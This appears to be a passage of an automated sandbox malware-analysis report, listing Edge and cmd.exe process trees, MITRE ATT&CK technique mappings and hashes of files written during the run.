- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1900,4048165679407303260,14421585043456759490,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:8
  2⤵
  PID:2532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4048165679407303260,14421585043456759490,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3088 /prefetch:1
  2⤵
  PID:3816
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4048165679407303260,14421585043456759490,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3096 /prefetch:1
  2⤵
  PID:3624

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2588

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4516

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://terminal/
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4192
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xe0,0x10c,0x7fff79623cb8,0x7fff79623cc8,0x7fff79623cd8
  2⤵
  PID:412
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,15601323778816430464,322132389663788431,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1940 /prefetch:2
  2⤵
  PID:2324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1928,15601323778816430464,322132389663788431,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1928,15601323778816430464,322132389663788431,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2796 /prefetch:8
  2⤵
  PID:1368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,15601323778816430464,322132389663788431,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
  2⤵
  PID:5072
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,15601323778816430464,322132389663788431,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
  2⤵
  PID:916

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2172

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:920

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.cmd.com/
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff79623cb8,0x7fff79623cc8,0x7fff79623cd8
  2⤵
  PID:1588
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2028,10688034855034120002,1998975009698779398,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2040 /prefetch:2
  2⤵
  PID:1776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2028,10688034855034120002,1998975009698779398,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2028,10688034855034120002,1998975009698779398,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:8
  2⤵
  PID:4608
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,10688034855034120002,1998975009698779398,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:1
  2⤵
  PID:1536
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,10688034855034120002,1998975009698779398,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1
  2⤵
  PID:4724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,10688034855034120002,1998975009698779398,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4404 /prefetch:1
  2⤵
  PID:5076
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2028,10688034855034120002,1998975009698779398,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3392 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,10688034855034120002,1998975009698779398,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
  2⤵
  PID:8

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4560

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2368

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
1⤵
PID:1884

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
df472dcddb36aa24247f8c8d8a517bd7

SHA1
6f54967355e507294cbc86662a6fbeedac9d7030

SHA256
e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

SHA512
06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
c03d23a8155753f5a936bd7195e475bc

SHA1
cdf47f410a3ec000e84be83a3216b54331679d63

SHA256
6f5f7996d9b0e131dc2fec84859b7a8597c11a67dd41bdb5a5ef21a46e1ae0ca

SHA512
6ea9a631b454d7e795ec6161e08dbe388699012dbbc9c8cfdf73175a0ecd51204d45cf28a6f1706c8d5f1780666d95e46e4bc27752da9a9d289304f1d97c2f41

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
3d68c7edc2a288ee58e6629398bb9f7c

SHA1
6c1909dea9321c55cae38b8f16bd9d67822e2e51

SHA256
dfd733ed3cf4fb59f2041f82fdf676973783ffa75b9acca095609c7d4f73587b

SHA512
0eda66a07ec4cdb46b0f27d6c8cc157415d803af610b7430adac19547e121f380b9c6a2840f90fe49eaea9b48fa16079d93833c2bcf4b85e3c401d90d464ad2f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
53b27f582cb38d5ab3937585ac1a1b67

SHA1
9b9876f673fbe903ad258a02812664f27409edc4

SHA256
75280f5cf4711a1b5826ed98b88176664b5cc30fe6c0e2b90d9b2ec0cba646e8

SHA512
4ec4090c745651ebc1f6e8cc82ebf7f9ea2931f58f40430f6d0dae6e2acc064aa8a6a3d40f6fc7548b1e05d4c7228365442bfb08e443790891618e73a212e692

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
032ea96b5df60569e774029bccf6b69b

SHA1
289de82a4681299f2eae6691bf379a4bcb03d488

SHA256
27addaee8b9de97e09fd5f55cc6bdd9a9c27eac0fa529f9957a64118bcef7ec2

SHA512
c2c3f070d770b72a157880fec5929494e8dbe44882b196f405cd786bc919388ceae086e7587c7fa603cfdb4977f61317762d45002d3c0cd35d2ecca1fd189fb6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b065c8d366464192027b017f3928546b

SHA1
16c54ce8c9ff992b725faeb4d7cb9aa891b0f1a9

SHA256
3714e7e05392481d02fc9c5908f90db9aae657d5fd2b0ae7b12b15ee8673bbe9

SHA512
ef39a718e8dd0c5c1e7661f59729f4b60c6dbb4cbacad5b79ae7d014f3accd37c1764b5267db9a8e4d95bd2747c73d7dc047aa93c676b3eef32cf447e3b9d465

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\18e3fc25-0ef5-4eff-8881-cfda54d8c713.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0

Filesize
44KB

MD5
33c0c47c136f0fe1d48a94cd333f0f28

SHA1
b173ef2ddbc4215c6fefc6de3a82e8707d0ab577

SHA256
1dc86b21687a3e57aede2f86b85ec4e4ffaab9553d9d22714dd1fdaa07c6e4cc

SHA512
c3e7cd33d7c5603313f8fac162b462d8fb69221955a8f5ef20ba51329d424a4c88fc7506e0ea6e9257656360f7afdc8cf489fe89c890ae3b708fe3fda3bb6c85

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0

Filesize
44KB

MD5
d1f604157b0745a40453afb93a6caa42

SHA1
3d5d77429b03674ebb0ba34d925ba1b09310df5e

SHA256
468456974fd86b33647942820dce7284879acfab9e9e6eca008e1fdcf9006fb5

SHA512
0644ce93724a57dedd8aec208e5a038e323a1b9871d5046d58a87c60479626693e6c8f25b7c7f7b60fd35aac133d2e660ecbd8f8d579ad1fc6703ae117a485a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1

Filesize
264KB

MD5
e0ee0adf8f000bd14cb9ddcfdbb16e75

SHA1
6c6ea794b366be6ef7adb5b40b4cbd542e67e014

SHA256
ee5e626574c2e6edd37943064d93c00d2b1f13c57d645396d726d009cb08c69b

SHA512
9443ed802c8c97ccc0b20b000b770980e4d8b340e277213f6e37c0d65f25e222309c2948ce797b590538a6296c5ea9f5b3771e5729ef91784a976ee314f93f97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache

Filesize
6B

MD5
a9851aa4c3c8af2d1bd8834201b2ba51

SHA1
fa95986f7ebfac4aab3b261d3ed0a21b142e91fc

SHA256
e708be5e34097c8b4b6ecb50ead7705843d0dc4b0779b95ef57073d80f36c191

SHA512
41a1b4d650ff55b164f3db02c8440f044c4ec31d8ddbbbf56195d4e27473c6b1379dfad3581e16429650e2364791f5c19aae723efc11986bb986ef262538b818

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Filesize
331B

MD5
8136d76fdd1befc6211bfe3839e62c55

SHA1
7dbb4c4df1c4cbbd047c0f0ca5881a901a4d6e40

SHA256
89e192ee58ce1fa7fd92ff5fbc539e52047d474fe8bb692c14d6bc8fcd4e61fb

SHA512
fe641ace74ba64d36c28bb4056f953d44fef3d51b91efb72873d5f02f60001d7ba13d7e33fac5d8e6e2455df649c71f3775be127fefb3a1bce8490e13f49ebd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
0e25dc907fdbe7d209e313bec9b7e484

SHA1
86d43d201c9c4d98affda8a526ce5c9d2ffbbd78

SHA256
a4e9df6bff830064690a1f7ae9dca30afef226d3ed6473db10384fdd7bde116d

SHA512
db5c6cbe6e628a90c21a05caf5920dba1a633d2a34bdef939752993c292dc9bfe48e5d1eebecda27b111068c045e62e02c65806d57326fc0d0d8cd22f58cc59a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
8d5f608bf572e8d5d542dc86bf6dd0a0

SHA1
cf5a7107016e5c01d8eb52e3c0a3ab84ec94aa22

SHA256
327cd5647745481492ccb16b209b6e02e018a720ee9eda1cd57225eb966d6737

SHA512
090905b4cfeab8ebfe2814913ad6b6136d4954c33d9cd7ffb16f42211a14c84d560721f4706841d7be67db6bf98a7b271c2d4144d24926b11b6bcebb3e8e4d1f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
96110c59ea67445f5edbc4fcd850bf9a

SHA1
6d1e4a196973c8f0c8115b9c98cc518327bc1b7a

SHA256
1c80d18cef522cc967fab547c2c6458b8fb133e4d3d5e08d839ac64e7538eadc

SHA512
840dc08bc5bec7e53ff3e93de2887083d65f312ea215fb6580581ea6285124bb447b314970181c2e7ce60bd4162a37d6219c83f9baba5cf96f04d27e0da692e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
433ff81e0020babd88164a4677fcdb56

SHA1
d90d472e4abb5cfd113c880e350ce9a6b1c4051b

SHA256
2106e345ebf895d2bcb51d84c06c90a34985829a681bc7c7a6b2f84c9af34ce2

SHA512
e4a14d267f229a0640396ca72a22086c69f6d9441ac19bca9d2ca6c9c2f8acfe8559e08463501b894409785bb36cc4a3c65a7b1a6db64da2f45f8198350fed80

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
37159abad71164121e7be6ee1de64fbc

SHA1
a7b3630909636a8cd299310a9b02b25ab3927d30

SHA256
33ef51ddca604790e6062b92edd0aa97affd196975d9a1b41e4f183131fec6ac

SHA512
8a08a1abbd45dd14c32f4c5f4f06d7cc93cc51a5fd11fd9bb7f1c4e521b2a81971f637f00c22fddc609f4ac2248446202e30a98d63754893796465c120f929e7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
9bc256c1ae42da2ce42d7661a9103c5b

SHA1
5890b421450b3bd1efa5c37713c61fedd2ea9054

SHA256
b5c30efee537826eb8821369a13c8b2968427ace99f0c0f5543d4a86a755c0ac

SHA512
fd1fee1180215458e9c7876f776aa752f7fd119fa244daf7c5e353bf44e09f21052ce48ca8a0604c64f442cee98b9a484c09701e9e5a59a9d66b723b8f6d130e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

Filesize
137B

MD5
a62d3a19ae8455b16223d3ead5300936

SHA1
c0c3083c7f5f7a6b41f440244a8226f96b300343

SHA256
c72428d5b415719c73b6a102e60aaa6ad94bdc9273ca9950e637a91b3106514e

SHA512
f3fc16fc45c8559c34ceba61739edd3facbbf25d114fecc57f61ec31072b233245fabae042cf6276e61c76e938e0826a0a17ae95710cfb21c2da13e18edbf99f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

Filesize
319B

MD5
a0aa14d62f626c079a34d2a3eee66d58

SHA1
3ed71dc8cea68a299c2adc2ef8d22b5a8a920089

SHA256
17de0c490b7d71e32e0d88276f5710393f34048134116058e680c739d9065ee2

SHA512
b904667060b7c2c324d96de3a0cffe1301c3d1936004f29a778138b383c9b37a0eb9aa99361a935280704d2ba1ffee055ff4b553f7fd3a02423ba9c95608ac79

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13382213757442609

Filesize
427B

MD5
6457169e7499e9b0aeac193c403a7407

SHA1
10d9574f7544d221ca73e8738210b26f8cb689bc

SHA256
72306f558380ff728f7a8e51eb052dbf43f42cb77b880cda3a2d0093bd034d06

SHA512
5bdde62a5982d0bdc337062c4673675e70fd98dd20339010b79488e3488322e5885ab5b17496da14775f25d43c757675447c4575624eb3319babff4b26acafcc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13382213757444609

Filesize
717B

MD5
25fe78aefdf84ab26bf028a987431385

SHA1
e94d542db93b7fea5860d9ea5fa19b0e4aa95254

SHA256
a79b1054288a879cad689f4309d63576e1790d5ed3ce204d03b7df4fb529f93c

SHA512
fbca0da9848475e501a26ac7d81a68f91b8b5b2f9b951dd9323dbda9b61ddab109de65f8e57e8eac1f4f39c1e71bdf3cb121dbe01451b8d923ec361cef7355e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Filesize
347B

MD5
6a3cdf4590c18dbf2b799d819b6412aa

SHA1
dbc2eb48d6790bc1b915a6a9b095930c18189450

SHA256
7f46a1d9a5759d858f5277f124e7aa46c737be1d92f1938dde730340073a1319

SHA512
63064b8eaf69a66230e45ad2acb1c22bb62920088ff300b52014a9c9c292070a69273bfd2fc9f428fa7a7770a8b92e80cbe3ef321bd993a3ac90c97ae41b0716

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Filesize
350B

MD5
7c4ffdc80da0f2b253fa3d3b0048fb6f

SHA1
cf7b8977257d39c99b343819d4064f97be3b3ba7

SHA256
fe914f7a9b319b9e87aad34dbd90d97c3586a3a9c1cd816a2dd5a8baea642207

SHA512
7b3999a1615fcaa7571e5e9c87365bddc5e0b7c2dfedfa0b2ce6ed4512dfb3d35d59056a9b83e5bf97e85093512e47b9fcb3f74758b05c230b6468fe39a085dd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Filesize
323B

MD5
152f3bdec411f7716aabf3afb6f9f20d

SHA1
dae44e7c47adf4b61d1bbe420bc0034c80cca87a

SHA256
cd472b22b2061e6775afbbdc69f83436601ea2c6ddf7d4467728615a7900e6a6

SHA512
50821eae0420944f3f7c8f9744d1a0ada8a93bd23d4da5f109d6e96504dfcc79fe211b9081ec8b75067380c15d6ba6e93252a9ec7c7cd8c3d4af83de031b6e5c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Filesize
323B

MD5
a00daf38c56a931cec1bd576c5ac0e18

SHA1
1fff4090f0ed08dbdf76fa330780e57adaec392d

SHA256
56c52c53afc8e7a2315b4f0619cd6d4eb03b59a917909421b0956e5b86241e2f

SHA512
eb0aa8c42e59ffb3f496d666ca01d53af6aadb5b2b0094e28a2b679e952f500b6dbe23f1c4cd36896ac564c5fe5e6e121997985e94ed82a0892096e7304d5b26

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db

Filesize
44KB

MD5
caa7e38f2ed40cfc9b19d8c1d00b6c9a

SHA1
1717c6054ededbd065ab3ebe9bded6fa4f834ac4

SHA256
34a4ff90daa06868c7987501e404213eae86d467edd3ebaa047c2f15f36a0137

SHA512
3f3a1ae74da4e964175a219684ea7143b79c23a4af4cd893ba84903c6e49ff16fe864e567ec6dbdd58ca81acb55371d27e5ae969c57cf5466d8f391960d2fdf1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db

Filesize
44KB

MD5
43e14bc996ba238128cb9f4913f076e0

SHA1
3754b2fef2f3bb7ab23df056019f53f9e0ec6035

SHA256
9f152d6efa27af592a4c99d9a07f85de8f175dd1905e88d2c42b00112e51d146

SHA512
445a662aa6372a3476c71fb0318ce49026d84eec4a8d72f197604332dd6476fe64afbb4436d1b440c80bdeefac415ad9719c090fec6906ad121cb327d91e72ab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

Filesize
319B

MD5
37e656cab363c3157f504769468d03b2

SHA1
4831eb0a33cce181b748ac7cc98d6c9d690fa02b

SHA256
5c098a2fd8d9c2d40bb76910fbd1c114308f6a1a66b472f1bd941ba87527ee92

SHA512
a2cb9f35e72a749812c0d9276f6c78182ce8d7f9eb21e992199642c3eac48c7b8ede2917d1482b9198d887e94993e30d6232b23e603990daec26c4760857f9be

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

Filesize
337B

MD5
b1643b979796ba38001be6adccf8f112

SHA1
a29b0ccb8a7388891674888a48d3a430307df496

SHA256
3f0ed8e046051c131647bd1a692d83db45e3438ce8fe745e782f84ebaccd188b

SHA512
1855a81cd1ef9facf2b363bc19ed4c6eb6c5b76db221d3da6c2b0a396795df6f661bbaad9a155e2ab550a118bf2af2323a3e5dbef941a005678c740945abc506

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0

Filesize
44KB

MD5
74842b162fad6f23a54635fb1c1663a3

SHA1
9833afb673b00085bb40449415162ce2d25607b0

SHA256
9883cbd45db8430a86d0f59d3a65e26f855748625d6919842904065ffec6b337

SHA512
9e6e6e77f2e16aae6288e83a1d320315897099fdecbbf434f8b9cbb0a4f4fdf580ba01a2c595d57653be8c322d863dcf46b5f833e1732e4e8f10ff73308dc0f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1

Filesize
264KB

MD5
b266bcb27c5cfd539558600e59a4b432

SHA1
88e7842412494888a0f04388538a6fcc30aeb72b

SHA256
6acf8d7b00f7d3595faabb0cbf198940bc52b26d5c5fd585bf0e5a4d5ed09dd5

SHA512
4b212cc8b87a322e2c1cca2cdddf4cad0f3ddf887a9999ae1f799c2aecf807f4844b2f7d4f75bb18294aadf07557ea846737abb5dee1b41228b8c866232ea1d0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3

Filesize
4.0MB

MD5
d2f556bc43588e3f0211c2fcd936c10f

SHA1
e17cc2316e76d111fb94228fcfefdbefb12e9091

SHA256
0ef23912d1ba671c7c919c2734fd32cf7c8c5a1cdcc8d4fa4e9bc95149f25be1

SHA512
455e23a53e2da49d322b9a4470fb69d38db733b7fe14037f1370f118910ed4102b2949d022e787f03e7c7fedd218ed74d84dcae8ede0b64f9de46ee3623757bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

Filesize
11B

MD5
b29bcf9cd0e55f93000b4bb265a9810b

SHA1
e662b8c98bd5eced29495dbe2a8f1930e3f714b8

SHA256
f53ab2877a33ef4dbde62f23f0cbfb572924a80a3921f47fc080d680107064b4

SHA512
e15f515e4177d38d6bb83a939a0a8f901ce64dffe45e635063161497d527fbddaf2b1261195fde90b72b4c3e64ac0a0500003faceffcc749471733c9e83eb011

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
6e2b25b15e8c519db33880c9633c5b1b

SHA1
be464cff4ea10f565c48be10655a383ccf6131b6

SHA256
78451041af34aa60c14a518ac01123e459bd2cdbb713c09b1f8e4019260fb09b

SHA512
